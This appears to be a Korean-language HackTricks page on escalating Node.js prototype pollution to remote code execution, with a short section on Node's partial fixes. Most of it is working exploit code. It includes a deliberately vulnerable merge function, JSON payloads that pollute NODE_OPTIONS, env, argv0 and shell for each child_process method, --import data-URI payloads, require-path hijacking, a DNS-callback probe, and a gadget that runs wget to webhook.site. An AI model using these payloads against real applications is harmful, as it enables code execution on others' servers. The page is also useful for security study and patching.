Prototype Pollution to RCE

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

취약한 코드

실제 JS가 다음과 같은 코드를 사용하는 것을 상상해 보세요:

const { execSync, fork } = require("child_process")

function isObject(obj) {
console.log(typeof obj)
return typeof obj === "function" || typeof obj === "object"
}

// Function vulnerable to prototype pollution
function merge(target, source) {
for (let key in source) {
if (isObject(target[key]) && isObject(source[key])) {
merge(target[key], source[key])
} else {
target[key] = source[key]
}
}
return target
}

function clone(target) {
return merge({}, target)
}

// Run prototype pollution with user input
// Check in the next sections what payload put here to execute arbitrary code
clone(USERINPUT)

// Spawn process, this will call the gadget that poputales env variables
// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
var proc = fork("a_file.js")

PP2RCE via env vars

PP2RCE는 Prototype Pollution to RCE (원격 코드 실행)을 의미합니다.

이 writeup에 따르면, **child_process**의 어떤 메서드(예: fork 또는 spawn 등)를 사용하여 프로세스가 생성될 때, normalizeSpawnArguments 메서드를 호출하며, 이는 새로운 env vars를 생성하기 위한 프로토타입 오염 가젯입니다:

//See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686

var env = options.env || process.env;
var envPairs = [];
[...]
let envKeys = [];
// Prototype values are intentionally included.
for (const key in env) {
ArrayPrototypePush(envKeys, key);
}
[...]
for (const key of envKeys) {
const value = env[key];
if (value !== undefined) {
ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
}
}

코드를 확인해보면 **envPairs**를 오염시켜 .env 속성을 통해 가능하다는 것을 알 수 있습니다.

`proto` 오염

Warning

child_process 라이브러리의 normalizeSpawnArguments 함수가 작동하는 방식 때문에, 프로세스에 새로운 env 변수를 설정하기 위해 무언가를 호출할 때 무엇이든 오염시키기만 하면 됩니다.
예를 들어, __proto__.avar="valuevar"를 실행하면 프로세스는 avar라는 이름의 변수를 valuevar 값으로 가진 상태로 생성됩니다.

그러나 env 변수가 첫 번째가 되기 위해서는 .env 속성을 오염시켜야 하며 (일부 방법에서만) 그 변수가 첫 번째가 됩니다 (공격을 허용함).

그래서 다음 공격에서 **NODE_OPTIONS**는 .env 안에 없습니다.

const { execSync, fork } = require("child_process")

// Manual Pollution
b = {}
b.__proto__.env = {
EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//",
}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"

// Trigger gadget
var proc = fork("./a_file.js")
// This should create the file /tmp/pp2rec

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce\\").toString())//"}}}'
)

clone(USERINPUT)

var proc = fork("a_file.js")
// This should create the file /tmp/pp2rec

`constructor.prototype` 오염

const { execSync, fork } = require("child_process")

// Manual Pollution
b = {}
b.constructor.prototype.env = {
EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//",
}
b.constructor.prototype.NODE_OPTIONS = "--require /proc/self/environ"

proc = fork("a_file.js")
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}}}'
)

clone(USERINPUT)

var proc = fork("a_file.js")
// This should create the file /tmp/pp2rec2

PP2RCE via env vars + cmdline

이전과 유사한 페이로드가 이 글에서 제안되었습니다. 주요 차이점은 다음과 같습니다:

nodejs payload를 파일 /proc/self/environ에 저장하는 대신, **/proc/self/cmdline**의 argv0에 저장합니다.
그런 다음, **NODE_OPTIONS**를 통해 파일 /proc/self/environ을 요구하는 대신, **/proc/self/cmdline**을 요구합니다.

const { execSync, fork } = require("child_process")

// Manual Pollution
b = {}
b.__proto__.argv0 =
"console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
b.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"

// Trigger gadget
var proc = fork("./a_file.js")
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}'
)

clone(USERINPUT)

var proc = fork("a_file.js")
// This should create the file /tmp/pp2rec

Filesystem-less PP2RCE via `--import` (Node ≥ 19)

Note

Node.js 19부터 CLI 플래그 --import를 NODE_OPTIONS를 통해 --require와 같은 방식으로 전달할 수 있습니다. --require와는 달리, --import는 data-URI를 이해하므로 공격자는 파일 시스템에 대한 쓰기 권한이 전혀 필요하지 않습니다. 이는 잠금된 또는 읽기 전용 환경에서 장치를 훨씬 더 신뢰할 수 있게 만듭니다.

이 기술은 2023년 5월 PortSwigger 연구에 의해 처음 공개적으로 문서화되었으며 이후 여러 CTF 챌린지에서 재현되었습니다.

공격은 위에서 보여준 --require /proc/self/* 트릭과 개념적으로 동일하지만, 파일을 가리키는 대신 페이로드를 base64로 인코딩된 data: URL에 직접 삽입합니다:

const { fork } = require("child_process")

// Manual pollution
b = {}

// Javascript that is executed once Node parses the import URL
const js = "require('child_process').execSync('touch /tmp/pp2rce_import')";
const payload = `data:text/javascript;base64,${Buffer.from(js).toString('base64')}`;

b.__proto__.NODE_OPTIONS = `--import ${payload}`;
// any key that will force spawn (fork) – same as earlier examples
fork("./a_file.js");

취약한 merge/clone sink를 악용하는 방법은 페이지 상단에 나와 있습니다:

USERINPUT = JSON.parse('{"__proto__":{"NODE_OPTIONS":"--import data:text/javascript;base64,cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCd0b3VjaCBcL3RtcFwvcHAycmNlX2ltcG9ydCcp"}}');
clone(USERINPUT);

// Gadget trigger
fork("./a_file.js");
// → creates /tmp/pp2rce_import

왜 `--import`가 도움이 되는가

디스크 상호작용 없음 – 페이로드는 프로세스 명령줄과 환경 내에서 완전히 이동합니다.
ESM 전용 환경에서 작동 – --import는 ECMAScript 모듈을 기본으로 하는 최신 Node 릴리스에서 JavaScript를 미리 로드하는 표준 방법입니다.
일부 --require 허용 목록 우회 – 몇몇 강화 라이브러리는 --require만 필터링하고 --import는 그대로 둡니다.

Warning

NODE_OPTIONS에서 --import 지원은 최신 Node 22.2.0 (2025년 6월)에서도 여전히 존재합니다. Node 코어 팀은 향후 데이터 URI를 제한하는 것에 대해 논의하고 있지만, 작성 시점에서는 완화 조치가 없습니다.

DNS 상호작용

다음 페이로드를 사용하여 이전에 논의한 NODE_OPTIONS 환경 변수를 악용하고 DNS 상호작용으로 작동 여부를 감지할 수 있습니다:

{
"__proto__": {
"argv0": "node",
"shell": "node",
"NODE_OPTIONS": "--inspect=id.oastify.com"
}
}

또는 WAF가 도메인을 요청하지 않도록 하려면:

{
"__proto__": {
"argv0": "node",
"shell": "node",
"NODE_OPTIONS": "--inspect=id\"\".oastify\"\".com"
}
}

PP2RCE 취약점 child_process 함수

이 섹션에서는 child_process의 각 함수를 분석하여 코드를 실행하고 해당 함수를 강제로 코드 실행하도록 하는 기술을 사용할 수 있는지 살펴보겠습니다:

exec 악용

```javascript // environ trick - not working // It's not possible to pollute the .env attr to create a first env var // because options.env is null (not undefined)

// cmdline trick - working with small variation // Working after kEmptyObject (fix) const { exec } = require(“child_process”) p = {} p.proto.shell = “/proc/self/exe” //You need to make sure the node executable is executed p.proto.argv0 = “console.log(require(‘child_process’).execSync(‘touch /tmp/exec-cmdline’).toString())//” p.proto.NODE_OPTIONS = “–require /proc/self/cmdline” var proc = exec(“something”)

// stdin trick - not working // Not using stdin

// Windows // Working after kEmptyObject (fix) const { exec } = require(“child_process”) p = {} p.proto.shell = “\\127.0.0.1\C$\Windows\System32\calc.exe” var proc = exec(“something”)

</details>

<details>

<summary><strong><code>execFile</code> 취약점 이용</strong></summary>
```javascript
// environ trick - not working
// It's not possible to pollute the .en attr to create a first env var

// cmdline trick - working with a big requirement
// Working after kEmptyObject (fix)
const { execFile } = require("child_process")
p = {}
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 =
"console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execFile("/usr/bin/node")

// stdin trick - not working
// Not using stdin

// Windows - not working

**execFile**가 작동하려면 반드시 node를 실행해야 NODE_OPTIONS가 작동합니다.
node를 실행하지 않는 경우, 실행 중인 것을 환경 변수를 사용하여 실행 방식을 변경할 수 있는 방법을 찾아야 합니다.

다른 기술들은 이 요구 사항 없이 작동합니다. 왜냐하면 프로토타입 오염을 통해 실행되는 것을 수정할 수 있기 때문입니다. (이 경우, .shell을 오염시킬 수 있더라도, 실행되는 것을 오염시킬 수는 없습니다).

fork exploitation

```javascript // environ trick - working // Working after kEmptyObject (fix) const { fork } = require("child_process") b = {} b.__proto__.env = { EVIL: "console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//", } b.__proto__.NODE_OPTIONS = "--require /proc/self/environ" var proc = fork("something")

// cmdline trick - working // Working after kEmptyObject (fix) const { fork } = require(“child_process”) p = {} p.proto.argv0 = “console.log(require(‘child_process’).execSync(‘touch /tmp/fork-cmdline’).toString())//” p.proto.NODE_OPTIONS = “–require /proc/self/cmdline” var proc = fork(“something”)

// stdin trick - not working // Not using stdin

// execArgv trick - working // Only the fork method has this attribute // Working after kEmptyObject (fix) const { fork } = require(“child_process”) b = {} b.proto.execPath = “/bin/sh” b.proto.argv0 = “/bin/sh” b.proto.execArgv = [“-c”, “touch /tmp/fork-execArgv”] var proc = fork(“./a_file.js”)

// Windows // Working after kEmptyObject (fix) const { fork } = require(“child_process”) b = {} b.proto.execPath = “\\127.0.0.1\C$\Windows\System32\calc.exe” var proc = fork(“./a_file.js”)

</details>

<details>

<summary><strong><code>spawn</code> 취약점 이용</strong></summary>
```javascript
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require("child_process")
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = {
EVIL: "console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//",
}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawn("something")
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require("child_process")
p = {}
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 =
"console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawn("something")
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// stdin trick - not working
// Not using stdin

// Windows
// NOT working after require(fix) without options
const { spawn } = require("child_process")
p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = spawn("something")
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)

execFileSync 취약점 이용

```javascript // environ trick - working with small variation (shell and argv0) // Working after kEmptyObject (fix) const { execFileSync } = require("child_process") p = {} // If in windows or mac you need to change the following params to the path of ndoe p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.env = { EVIL: "console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//", } p.__proto__.NODE_OPTIONS = "--require /proc/self/environ" var proc = execFileSync("something")

// cmdline trick - working with small variation (shell) // Working after kEmptyObject (fix) const { execFileSync } = require(“child_process”) p = {} p.proto.shell = “/proc/self/exe” //You need to make sure the node executable is executed p.proto.argv0 = “console.log(require(‘child_process’).execSync(‘touch /tmp/execFileSync-cmdline’).toString())//” p.proto.NODE_OPTIONS = “–require /proc/self/cmdline” var proc = execFileSync(“something”)

// stdin trick - working // Working after kEmptyObject (fix) const { execFileSync } = require(“child_process”) p = {} p.proto.argv0 = “/usr/bin/vim” p.proto.shell = “/usr/bin/vim” p.proto.input = “:!{touch /tmp/execFileSync-stdin}\n” var proc = execFileSync(“something”)

// Windows // Working after kEmptyObject (fix) const { execSync } = require(“child_process”) p = {} p.proto.shell = “\\127.0.0.1\C$\Windows\System32\calc.exe” p.proto.argv0 = “\\127.0.0.1\C$\Windows\System32\calc.exe” var proc = execSync(“something”)

</details>

<details>

<summary><strong><code>execSync</code> 취약점 이용</strong></summary>
```javascript
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execSync } = require("child_process")
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = {
EVIL: "console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//",
}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execSync("something")

// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execSync } = require("child_process")
p = {}
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 =
"console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execSync("something")

// stdin trick - working
// Working after kEmptyObject (fix)
const { execSync } = require("child_process")
p = {}
p.__proto__.argv0 = "/usr/bin/vim"
p.__proto__.shell = "/usr/bin/vim"
p.__proto__.input = ":!{touch /tmp/execSync-stdin}\n"
var proc = execSync("something")

// Windows
// Working after kEmptyObject (fix)
const { execSync } = require("child_process")
p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = execSync("something")

spawnSync 악용

```javascript // environ trick - working with small variation (shell and argv0) // NOT working after kEmptyObject (fix) without options const { spawnSync } = require("child_process") p = {} // If in windows or mac you need to change the following params to the path of node p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.env = { EVIL: "console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//", } p.__proto__.NODE_OPTIONS = "--require /proc/self/environ" var proc = spawnSync("something") //var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell) // NOT working after kEmptyObject (fix) without options const { spawnSync } = require(“child_process”) p = {} p.proto.shell = “/proc/self/exe” //You need to make sure the node executable is executed p.proto.argv0 = “console.log(require(‘child_process’).execSync(‘touch /tmp/spawnSync-cmdline’).toString())//” p.proto.NODE_OPTIONS = “–require /proc/self/cmdline” var proc = spawnSync(“something”) //var proc = spawnSync(‘something’,[],{“cwd”:“/tmp”}); //To work after kEmptyObject (fix)

// stdin trick - working // NOT working after kEmptyObject (fix) without options const { spawnSync } = require(“child_process”) p = {} p.proto.argv0 = “/usr/bin/vim” p.proto.shell = “/usr/bin/vim” p.proto.input = “:!{touch /tmp/spawnSync-stdin}\n” var proc = spawnSync(“something”) //var proc = spawnSync(‘something’,[],{“cwd”:“/tmp”}); //To work after kEmptyObject (fix)

// Windows // NOT working after require(fix) without options const { spawnSync } = require(“child_process”) p = {} p.proto.shell = “\\127.0.0.1\C$\Windows\System32\calc.exe” var proc = spawnSync(“something”) //var proc = spawnSync(‘something’,[],{“cwd”:“C:\”}); //To work after kEmptyObject (fix)

</details>

## 강제 스폰

이전 예제에서는 가젯을 트리거하는 방법을 보았고, **`spawn`**을 호출하는 기능이 **존재해야** 한다는 것을 알았습니다 (무언가를 실행하기 위해 사용되는 모든 **`child_process`** 메서드는 이를 호출합니다). 이전 예제에서는 **코드의 일부**였지만, 코드가 **호출하지 않는** 경우는 어떻게 될까요?

### require 파일 경로 제어

이 [**다른 글**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)에서 사용자는 **`require`**가 실행될 파일 경로를 제어할 수 있습니다. 이 시나리오에서 공격자는 **시스템 내에서 `.js` 파일을 찾아야** 하며, 해당 파일이 **가져올 때 스폰 메서드를 실행합니다.**\
가져올 때 스폰 함수를 호출하는 일반적인 파일의 몇 가지 예는 다음과 같습니다:

- /path/to/npm/scripts/changelog.js
- /opt/yarn-v1.22.19/preinstall.js
- **아래에서 더 많은 파일 찾기**

다음 간단한 스크립트는 **패딩 없이** **child_process**의 **호출**을 검색합니다 (함수 내의 호출을 표시하지 않기 위해):
```bash
find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
done
# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.

이전 스크립트에서 발견된 흥미로운 파일

node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })
node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })
node_modules/npm/scripts/changelog.js:16:const log = execSync(git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...).toString().split(/\n/)
node_modules/detect-libc/bin/detect-libc.js:18:process.exit(spawnSync(process.argv[2], process.argv.slice(3), spawnOptions).status);
node_modules/jest-expo/bin/jest.js:26:const result = childProcess.spawnSync('node', jestWithArgs, { stdio: 'inherit' });
node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })
node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })
node_modules/runtypes/scripts/format.js:13:const npmBinPath = execSync('npm bin').toString().trim();
node_modules/node-pty/scripts/publish.js:31:const result = cp.spawn('npm', args, { stdio: 'inherit' });

프로토타입 오염을 통한 require 파일 경로 설정

Warning

이전 기술은 사용자가 파일의 경로를 제어해야 한다는 전제가 필요합니다. 하지만 이것이 항상 사실은 아닙니다.

그러나 코드가 프로토타입 오염 후에 require를 실행할 경우, 경로를 제어하지 않더라도 프로토타입 오염을 악용하여 다른 경로를 강제로 지정할 수 있습니다. 따라서 코드 라인이 require("./a_file.js") 또는 require("bytes")와 같더라도 오염된 패키지를 require할 것입니다.

따라서 프로토타입 오염 후에 require가 실행되고 spawn 함수가 없으면, 공격은 다음과 같습니다:

시스템 내의 .js 파일을 찾습니다. 이 파일이 require될 때 child_process를 사용하여 무언가를 실행합니다.
공격하는 플랫폼에 파일을 업로드할 수 있다면, 그런 파일을 업로드할 수 있습니다.
경로를 오염시켜 .js 파일의 require 로드를 강제합니다. 이 파일은 child_process로 무언가를 실행할 것입니다.
환경/명령줄을 오염시켜 child_process 실행 함수가 호출될 때 임의의 코드를 실행합니다 (초기 기술 참조).

절대 require

수행된 require가 절대적(require("bytes"))이고 패키지가 package.json 파일에 main을 포함하지 않는 경우, main 속성을 오염시켜 require가 다른 파일을 실행하도록 만들 수 있습니다.

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Install package bytes (it doesn't have a main in package.json)
// npm install bytes

// Manual Pollution
b = {}
b.__proto__.main = "/tmp/malicious.js"

// Trigger gadget
var proc = require("bytes")
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_absolute\\").toString())//"}}'
)

clone(USERINPUT)

var proc = require("bytes")
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

const { fork } = require("child_process")
console.log("Hellooo from malicious")
fork("anything")

상대 경로 - 1

절대 경로 대신 상대 경로가 로드되면, 노드가 다른 경로를 로드하도록 만들 수 있습니다:

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {}
b.__proto__.exports = { ".": "./malicious.js" }
b.__proto__["1"] = "/tmp"

// Trigger gadget
var proc = require("./relative_path.js")
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_1\\").toString())//"}}'
)

clone(USERINPUT)

var proc = require("./relative_path.js")
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

const { fork } = require("child_process")
console.log("Hellooo from malicious")
fork("/path/to/anything")

상대 require - 2

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {}
b.__proto__.data = {}
b.__proto__.data.exports = { ".": "./malicious.js" }
b.__proto__.path = "/tmp"
b.__proto__.name = "./relative_path.js" //This needs to be the relative path that will be imported in the require

// Trigger gadget
var proc = require("./relative_path.js")
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse(
'{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_path\\").toString())//"}}'
)

clone(USERINPUT)

var proc = require("./relative_path.js")
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

const { fork } = require("child_process")
console.log("Hellooo from malicious")
fork("/path/to/anything")

Relative require - 3

이전과 유사하게, 이 글에서 발견되었습니다.

// Requiring /opt/yarn-v1.22.19/preinstall.js
Object.prototype["data"] = {
exports: {
".": "./preinstall.js",
},
name: "./usage",
}
Object.prototype["path"] = "/opt/yarn-v1.22.19"
Object.prototype.shell = "node"
Object.prototype["npm_config_global"] = 1
Object.prototype.env = {
NODE_DEBUG:
"console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
NODE_OPTIONS: "--require=/proc/self/environ",
}

require("./usage.js")

VM Gadgets

논문 https://arxiv.org/pdf/2207.11171.pdf에서는 vm 라이브러리의 일부 메서드에서 **contextExtensions**의 제어가 가젯으로 사용될 수 있다고도 언급하고 있습니다.
그러나 이전의 child_process 메서드와 마찬가지로 최신 버전에서 수정되었습니다.

Fixes & Unexpected protections

프로토타입 오염은 접근하는 객체의 attribute가 undefined일 때 작동합니다. 만약 코드에서 그 attribute에 값이 설정되어 있다면 덮어쓸 수 없습니다.

2022년 6월 이 커밋에서 var options는 {} 대신 **kEmptyObject**입니다. 이는 RCE를 얻기 위해 **options**의 attributes에 영향을 미치는 프로토타입 오염을 방지합니다.
최소한 v18.4.0부터 이 보호가 구현되었으며, 따라서 spawn 및 spawnSync 익스플로잇은 더 이상 작동하지 않습니다 (옵션이 사용되지 않는 경우!).

이 커밋에서는 vm 라이브러리의 **contextExtensions**의 prototype pollution이 {} 대신 **kEmptyObject**로 설정하여 어느 정도 수정되었습니다.

[!INFO] **Node 20 (2023년 4월) 및 Node 22 (2025년 4월)**는 추가적인 강화 조치를 도입했습니다: 여러 child_process 헬퍼는 이제 참조로 사용하는 대신 **CopyOptions()**로 사용자 제공 options를 복사합니다. 이는 stdio와 같은 중첩 객체의 오염을 차단하지만, 위에서 설명한 NODE_OPTIONS / --import 트릭에 대해서는 보호하지 않습니다 – 이러한 플래그는 여전히 환경 변수를 통해 수용됩니다.
완전한 수정은 부모 프로세스에서 전파될 수 있는 CLI 플래그를 제한해야 하며, 이는 Node Issue #50559에서 추적되고 있습니다.

Other Gadgets

References

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.